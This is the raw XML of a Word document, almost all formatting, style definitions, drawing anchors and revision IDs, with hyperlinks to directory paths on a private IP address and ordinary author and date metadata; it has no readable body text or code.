          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="3147231B" w14:textId="27C25C2C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="72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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="5618F608" w14:textId="7B808D18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7FBC86EA" w14:textId="089882DC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0B9C6C7D" w14:textId="2F7C4CEF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1966FEB7" w14:textId="5125E0CD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51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="1BD12F7D" w14:textId="4D08E724">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/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</w:pPr>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="147F5C0A" w14:textId="280D5035">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pP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                                              </w:t>
      </w:r>
      <w:r w:rsidR="360DE0DE">
        <w:drawing>
          <wp:inline wp14:editId="1510E7C5" wp14:anchorId="3DE8346B">
            <wp:extent cx="6838950" cy="3832662"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1668587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805c57dff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83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           </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="6683AE2F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082A75" w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                             </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="6683AE2F"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  <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E68D9D3" w:rsidP="51CB6664" w:rsidRDefault="0E68D9D3" w14:paraId="5B7FB567" w14:textId="5B63825B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082A75" w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0E68D9D3">
        <w:drawing>
          <wp:inline wp14:editId="1E53C85D" wp14:anchorId="30F4AA9E">
            <wp:extent cx="6655744" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1100928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875c15d02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74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70D02" w:rsidR="0087605E" w:rsidSect="005D55B2">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:headerReference w:type="first" r:id="rId10"/>
      <w:footerReference w:type="first" r:id="rId11"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1512" w:right="1152" w:bottom="720" w:left="1152" w:header="720" w:footer="288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7740" w:rsidRDefault="00557740" w14:paraId="25C39BAB" w14:textId="77777777">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00557740" w:rsidRDefault="00557740" w14:paraId="5C37B733" w14:textId="77777777"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00557740" w:rsidRDefault="00557740" w14:paraId="1358EBF0" w14:textId="77777777">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00557740" w:rsidRDefault="00557740" w14:paraId="55601859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027C" w:rsidRDefault="00002F00" w14:paraId="624EB584" w14:textId="67F8F4A6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rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00DF027C" w:rsidRDefault="00DF027C" w14:paraId="009671B5" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Foo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p14">
  <w:p w:rsidR="00002F00" w:rsidRDefault="00002F00" w14:paraId="09F6D0EA" w14:textId="5A6DFAD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483C185D" wp14:editId="3FC6DF1C">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-731520</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-2959735</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7763256" cy="3373665"/>
              <wp:effectExtent l="0" t="0" r="9525" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="11" name="Rectangle 11" descr="Colore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3256" cy="3373665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rect id="Rectangle 11" style="position:absolute;margin-left:-57.6pt;margin-top:-233.05pt;width:611.3pt;height:265.65pt;z-index:-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Colored rectangle" o:spid="_x0000_s1026" fillcolor="#34aba2 [3206]" stroked="f" strokeweight="2pt" w14:anchorId="153B97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7740" w:rsidRDefault="00557740" w14:paraId="22FAF1F9" w14:textId="77777777">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00557740" w:rsidRDefault="00557740" w14:paraId="10219488" w14:textId="77777777"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00557740" w:rsidRDefault="00557740" w14:paraId="42B4A647" w14:textId="77777777">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00557740" w:rsidRDefault="00557740" w14:paraId="275BD214" w14:textId="77777777"/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bottom w:val="single" w:color="34ABA2" w:themeColor="accent3" w:sz="36" w:space="0"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      <w:tblDescription w:val="Header layout"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="9990"/>
    </w:tblGrid>
    <w:tr w:rsidR="00D077E9" w:rsidTr="005D55B2" w14:paraId="438B7EA3" w14:textId="77777777">
      <w:trPr>
        <w:trHeight w:val="259" w:hRule="exact"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="9990" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="00D077E9" w:rsidRDefault="00D077E9" w14:paraId="7E815AF6" w14:textId="19C3AFE7">
          <w:pPr>
            <w:pStyle w:val="Header"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00D077E9" w:rsidP="00D077E9" w:rsidRDefault="00D077E9" w14:paraId="59860303" w14:textId="77777777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p w:rsidR="0046337B" w:rsidRDefault="00002F00" w14:paraId="2C961035" w14:textId="67F2FFC8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1" allowOverlap="1" wp14:anchorId="3BB9F08C" wp14:editId="631FDF71">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-750570</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-457200</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7763256" cy="6682574"/>
          <wp:effectExtent l="0" t="0" r="0" b="4445"/>
          <wp:wrapNone/>
          <wp:docPr id="19" name="Picture 19" descr="Street view with city buildings, market and street sing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 descr="Street view with city buildings, market and street sings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3256" cy="66825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04B7B1D" wp14:editId="412B6177">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-188595</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>457200</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3939540" cy="8265795"/>
              <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
              <wp:wrapNone/>
              <wp:docPr id="13" name="Rectangle 13" descr="White rectangle for text on cov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39540" cy="82657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rect id="Rectangle 13" style="position:absolute;margin-left:-14.85pt;margin-top:36pt;width:310.2pt;height:65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White rectangle for text on cover" o:spid="_x0000_s1026" fillcolor="white [3212]" stroked="f" strokeweight="2pt" w14:anchorId="5386B4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"/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>
  <int2:observations>
    <int2:textHash int2:hashCode="+auj8SmbSkjnXu" int2:id="huA9S1wD">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="YEYtDzFPSyrEg0" int2:id="m2RItQw2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2be816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1138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b8f9a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5996f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76329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e09f0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trackRevisions w:val="false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62F"/>
    <w:rsid w:val="00002F00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6C7E"/>
    <w:rsid w:val="003778F7"/>
    <w:rsid w:val="00384EA3"/>
    <w:rsid w:val="003A39A1"/>
    <w:rsid w:val="003C2191"/>
    <w:rsid w:val="003D3863"/>
    <w:rsid w:val="004110DE"/>
    <w:rsid w:val="0044085A"/>
    <w:rsid w:val="0046337B"/>
    <w:rsid w:val="004B21A5"/>
    <w:rsid w:val="005037F0"/>
    <w:rsid w:val="00516A86"/>
    <w:rsid w:val="005275F6"/>
    <w:rsid w:val="00557740"/>
    <w:rsid w:val="00572102"/>
    <w:rsid w:val="005D55B2"/>
    <w:rsid w:val="005F1BB0"/>
    <w:rsid w:val="00656C4D"/>
    <w:rsid w:val="0069F9B0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951FF"/>
    <w:rsid w:val="008B1FEE"/>
    <w:rsid w:val="00903C32"/>
    <w:rsid w:val="00916B16"/>
    <w:rsid w:val="009173B9"/>
    <w:rsid w:val="0093335D"/>
    <w:rsid w:val="0093613E"/>
    <w:rsid w:val="00943026"/>
    <w:rsid w:val="00966B81"/>
    <w:rsid w:val="009A24C3"/>
    <w:rsid w:val="009C7720"/>
    <w:rsid w:val="00A23AFA"/>
    <w:rsid w:val="00A31B3E"/>
    <w:rsid w:val="00A532F3"/>
    <w:rsid w:val="00A8489E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06D8"/>
    <w:rsid w:val="00D86945"/>
    <w:rsid w:val="00D90290"/>
    <w:rsid w:val="00DD152F"/>
    <w:rsid w:val="00DE213F"/>
    <w:rsid w:val="00DF027C"/>
    <w:rsid w:val="00E00A32"/>
    <w:rsid w:val="00E057CF"/>
    <w:rsid w:val="00E22ACD"/>
    <w:rsid w:val="00E368F3"/>
    <w:rsid w:val="00E36A9E"/>
    <w:rsid w:val="00E620B0"/>
    <w:rsid w:val="00E81B40"/>
    <w:rsid w:val="00EF555B"/>
    <w:rsid w:val="00F027BB"/>
    <w:rsid w:val="00F11DCF"/>
    <w:rsid w:val="00F162EA"/>
    <w:rsid w:val="00F25458"/>
    <w:rsid w:val="00F52D27"/>
    <w:rsid w:val="00F83527"/>
    <w:rsid w:val="00FD583F"/>
    <w:rsid w:val="00FD7488"/>
    <w:rsid w:val="00FE479A"/>
    <w:rsid w:val="00FF16B4"/>
    <w:rsid w:val="0375F19F"/>
    <w:rsid w:val="03B1CC18"/>
    <w:rsid w:val="047301E3"/>
    <w:rsid w:val="05C88CAE"/>
    <w:rsid w:val="05FD976D"/>
    <w:rsid w:val="0BBCDDFD"/>
    <w:rsid w:val="0C6A9AF6"/>
    <w:rsid w:val="0D8F7F56"/>
    <w:rsid w:val="0E68D9D3"/>
    <w:rsid w:val="0F2B4FB7"/>
    <w:rsid w:val="1262F079"/>
    <w:rsid w:val="15470BEA"/>
    <w:rsid w:val="1609A39D"/>
    <w:rsid w:val="16FF90A4"/>
    <w:rsid w:val="19043D92"/>
    <w:rsid w:val="1ADD14C0"/>
    <w:rsid w:val="1AED3633"/>
    <w:rsid w:val="1E0D9245"/>
    <w:rsid w:val="1FA962A6"/>
    <w:rsid w:val="201D78F1"/>
    <w:rsid w:val="22257C47"/>
    <w:rsid w:val="238910D6"/>
    <w:rsid w:val="258393B4"/>
    <w:rsid w:val="27F83C8A"/>
    <w:rsid w:val="2E0B2329"/>
    <w:rsid w:val="2F0F8B7C"/>
    <w:rsid w:val="304453E7"/>
    <w:rsid w:val="308B478D"/>
    <w:rsid w:val="32B096B6"/>
    <w:rsid w:val="360DE0DE"/>
    <w:rsid w:val="36A452D2"/>
    <w:rsid w:val="3A523E23"/>
    <w:rsid w:val="3BCACE8D"/>
    <w:rsid w:val="3E9CB54D"/>
    <w:rsid w:val="409E3FB0"/>
    <w:rsid w:val="40B044D0"/>
    <w:rsid w:val="4180AC3A"/>
    <w:rsid w:val="41C525FA"/>
    <w:rsid w:val="42A9058D"/>
    <w:rsid w:val="464F7710"/>
    <w:rsid w:val="4688B3BD"/>
    <w:rsid w:val="47676966"/>
    <w:rsid w:val="47A99DCE"/>
    <w:rsid w:val="4BBFB568"/>
    <w:rsid w:val="4C29C86F"/>
    <w:rsid w:val="4CE90EE7"/>
    <w:rsid w:val="4E2792AD"/>
    <w:rsid w:val="501E5B2C"/>
    <w:rsid w:val="51406870"/>
    <w:rsid w:val="51CB6664"/>
    <w:rsid w:val="52710DB8"/>
    <w:rsid w:val="570F61FD"/>
    <w:rsid w:val="5768A066"/>
    <w:rsid w:val="5B59204D"/>
    <w:rsid w:val="5CF6D799"/>
    <w:rsid w:val="5E7F8638"/>
    <w:rsid w:val="6057261A"/>
    <w:rsid w:val="60C5EEC4"/>
    <w:rsid w:val="60F2A1B4"/>
    <w:rsid w:val="611111CA"/>
    <w:rsid w:val="61B726FA"/>
    <w:rsid w:val="62BC24C4"/>
    <w:rsid w:val="6446BA4E"/>
    <w:rsid w:val="64764F8B"/>
    <w:rsid w:val="66808083"/>
    <w:rsid w:val="6683AE2F"/>
    <w:rsid w:val="688358DA"/>
    <w:rsid w:val="69CA2665"/>
    <w:rsid w:val="6FE65D51"/>
    <w:rsid w:val="70FB34EA"/>
    <w:rsid w:val="71026548"/>
    <w:rsid w:val="713E65B3"/>
    <w:rsid w:val="74211085"/>
    <w:rsid w:val="77CB4FD2"/>
    <w:rsid w:val="792637A1"/>
    <w:rsid w:val="7CF7D6A1"/>
    <w:rsid w:val="7DEA3EB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69F9B0"/>
  <w15:docId w15:val="{71DFE47E-4A2F-43B4-A508-CCEDE1AC2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uiPriority="5" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 4" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 5" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 6" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 7" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 8" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 9" w:uiPriority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semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Strong" w:uiPriority="2" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="Emphasis" w:uiPriority="2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hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia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hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:sz w:val="72"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00D86945"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia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hAnchor="margin" w:vAnchor="text" w:y="1167"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:caps/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtitleChar" w:customStyle="1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styleId="Heading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="4"/>
    <w:rsid w:val="00D077E9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia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D55B2"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HeaderChar" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="8"/>
    <w:rsid w:val="005D55B2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:color w:val="082A75" w:themeColor="text2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styleId="FooterChar" w:customStyle="1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styleId="Name" w:customStyle="1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styleId="Heading2Char" w:customStyle="1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styleId="Content" w:customStyle="1">
    <w:name w:val="Content"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ContentChar"/>
    <w:qFormat/>
    <w:rsid w:val="00DF027C"/>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EmphasisText" w:customStyle="1">
    <w:name w:val="Emphasis Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EmphasisTextChar"/>
    <w:qFormat/>
    <w:rsid w:val="00DF027C"/>
  </w:style>
  <w:style w:type="character" w:styleId="ContentChar" w:customStyle="1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styleId="EmphasisTextChar" w:customStyle="1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1.xml" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme11.xml" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.svg" Id="rId7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footer" Target="footer21.xml" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header22.xml" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R819a2e8266754cb5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R5a15eb52f32b4df3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R4c08d154fad24aea" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R3d5473a9bbf44490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R4c8a1ade05dc4686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R44a805c57dff496f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rea7875c15d024068" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R36176c6086d9484e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Rcc27bf5defb04023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.243.24/" TargetMode="External" Id="Rf047833083bc4bdc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.243.24/" TargetMode="External" Id="Radfc4d9f78624317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.243.24/css/" TargetMode="External" Id="R9f8479b058944410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.243.24/deployment/" TargetMode="External" Id="R8ded674d26b64054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.243.24/images/" TargetMode="External" Id="R19676e2eaa234fcd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.243.24/manual/" TargetMode="External" Id="Rb58e9eb8f49746fd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Rd4195ad954d44510" /></Relationships>
</file>

<file path=word/_rels/header22.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/word/media/image3.jpeg" Id="rId1" /></Relationships>
</file>

<file path=word/theme/theme1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TM16392850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keywords/>
  <lastModifiedBy>Altamash Arif Karlekar</lastModifiedBy>
  <revision>4</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-31T00:53:52.9720226Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-01T14:23:55.0430367Z</dcterms:modified>
  <version/>
  <dc:creator>Altamash Arif Karlekar</dc:creator>
</coreProperties>
</file>